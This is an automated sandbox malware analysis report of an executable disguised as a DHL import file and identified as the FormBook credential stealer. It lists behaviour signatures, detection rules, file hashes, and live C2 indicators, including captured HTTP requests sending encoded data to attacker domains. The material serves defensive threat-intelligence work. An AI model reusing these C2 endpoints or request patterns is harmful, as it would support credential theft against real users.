Edit tour

Windows Analysis Report
DHL_IMPORT_8236820594.exe

Overview

General Information

Sample name:	DHL_IMPORT_8236820594.exe
Analysis ID:	1549014
MD5:	9711bd672d1a08a3ee97bc0b7afcbac5
SHA1:	2badf5e83881cbd8e56c4c6d06135d41150d8063
SHA256:	9f0af38d3b2b10dfb7206c429731828f5de95fbc6f54ec2d548686893256fb8f
Tags:	exeuser-AdamZ
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Update Standalone Installer command line found (may be used to bypass UAC)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DHL_IMPORT_8236820594.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 9711BD672D1A08A3EE97BC0B7AFCBAC5)

svchost.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

gdWgEHryJDTaS.exe (PID: 5236 cmdline: "C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

wusa.exe (PID: 7908 cmdline: "C:\Windows\SysWOW64\wusa.exe" MD5: EB96F0F207F203DD0B6D8A2625270495)

net.exe (PID: 7916 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)

gdWgEHryJDTaS.exe (PID: 1076 cmdline: "C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 8176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7684, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 7700, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7684, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 7700, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T07:11:19.198896+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-05T07:11:58.071385+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49738	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T07:11:58.092036+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-11-05T07:12:00.654540+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-11-05T07:12:03.191808+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-11-05T07:12:11.438629+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49791	3.33.130.190	80	TCP
2024-11-05T07:12:14.042587+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49807	3.33.130.190	80	TCP
2024-11-05T07:12:16.646708+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49822	3.33.130.190	80	TCP
2024-11-05T07:12:25.810847+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49874	154.23.184.95	80	TCP
2024-11-05T07:12:28.310942+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49889	154.23.184.95	80	TCP
2024-11-05T07:12:30.904519+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49903	154.23.184.95	80	TCP
2024-11-05T07:12:39.782752+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49953	172.67.185.22	80	TCP
2024-11-05T07:12:42.367794+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49968	172.67.185.22	80	TCP
2024-11-05T07:12:44.911024+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49983	172.67.185.22	80	TCP
2024-11-05T07:12:54.084875+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	206.119.82.172	80	TCP
2024-11-05T07:12:57.076480+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	206.119.82.172	80	TCP
2024-11-05T07:12:59.141530+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50022	206.119.82.172	80	TCP
2024-11-05T07:13:17.185898+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	103.191.208.137	80	TCP
2024-11-05T07:13:19.732898+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	103.191.208.137	80	TCP
2024-11-05T07:13:22.279673+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	103.191.208.137	80	TCP
2024-11-05T07:13:32.923725+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	3.111.160.216	80	TCP
2024-11-05T07:13:35.451522+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	3.111.160.216	80	TCP
2024-11-05T07:13:38.029659+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	3.111.160.216	80	TCP
2024-11-05T07:13:46.767905+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	203.161.49.193	80	TCP
2024-11-05T07:13:49.293655+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	203.161.49.193	80	TCP
2024-11-05T07:13:51.896491+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50034	203.161.49.193	80	TCP
2024-11-05T07:14:00.219061+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50036	188.114.97.3	80	TCP
2024-11-05T07:14:02.740579+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	188.114.97.3	80	TCP
2024-11-05T07:14:05.301303+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50038	188.114.97.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL_IMPORT_8236820594.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: DHL_IMPORT_8236820594.exe	ReversingLabs: Detection: 42%
Source: DHL_IMPORT_8236820594.exe	Virustotal: Detection: 31%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL_IMPORT_8236820594.exe

Joe Sandbox ML: detected

Source: DHL_IMPORT_8236820594.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wusa.pdbGCTL source: gdWgEHryJDTaS.exe, 00000003.00000003.1835970150.000000000095B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: net.pdbUGP source: svchost.exe, 00000001.00000003.1865620588.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897224654.0000000003412000.00000004.00000020.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000003.1836127008.00000000009FD000.00000004.00000001.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000002.3506149232.0000000000A08000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wusa.pdb source: gdWgEHryJDTaS.exe, 00000003.00000003.1835970150.000000000095B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gdWgEHryJDTaS.exe, 00000003.00000002.3505893888.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, gdWgEHryJDTaS.exe, 00000008.00000000.1987192502.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657304784.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1658062081.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1807048272.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1805257232.0000000003600000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.1914442444.0000000000948000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000005.00000003.1916425362.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657304784.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1658062081.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1807048272.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1805257232.0000000003600000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000005.00000003.1914442444.0000000000948000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000005.00000003.1916425362.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: net.exe, 00000005.00000002.3505635674.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3507156756.000000000348C000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.00000000027AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002BE6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: net.exe, 00000005.00000002.3505635674.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3507156756.000000000348C000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.00000000027AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002BE6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: net.pdb source: svchost.exe, 00000001.00000003.1865620588.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897224654.0000000003412000.00000004.00000020.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000003.1836127008.00000000009FD000.00000004.00000001.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000002.3506149232.0000000000A08000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005568EE FindFirstFileW,FindClose,	0_2_005568EE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0055698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0055698F
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0054D076
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0054D3A9
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00559642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00559642
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0055979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0055979D
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00559B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00559B2B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0054DBBE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00555C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00555C97
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004BC980 FindFirstFileW,FindNextFileW,FindClose,	5_2_004BC980

Source: C:\Windows\SysWOW64\net.exe	Code function: 4x nop then xor eax, eax		5_2_004A9DE0
Source: C:\Windows\SysWOW64\net.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_00B404EB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49791 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49874 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 154.23.184.95:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 172.67.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49968 -> 172.67.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49983 -> 172.67.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 3.111.160.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 206.119.82.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 3.111.160.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 206.119.82.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 3.111.160.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 206.119.82.172:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 188.114.97.3:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.iuyi542.xyz

Source: Joe Sandbox View	IP Address: 203.161.49.193 203.161.49.193
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49738

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0055CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0055CE44

Source: global traffic	HTTP traffic detected: GET /b6lw/?FLL4t=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.iuyi542.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.vrxlzluy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /3c6w/?FLL4t=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.trifecta.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /rj0s/?FLL4t=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.wcp95.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
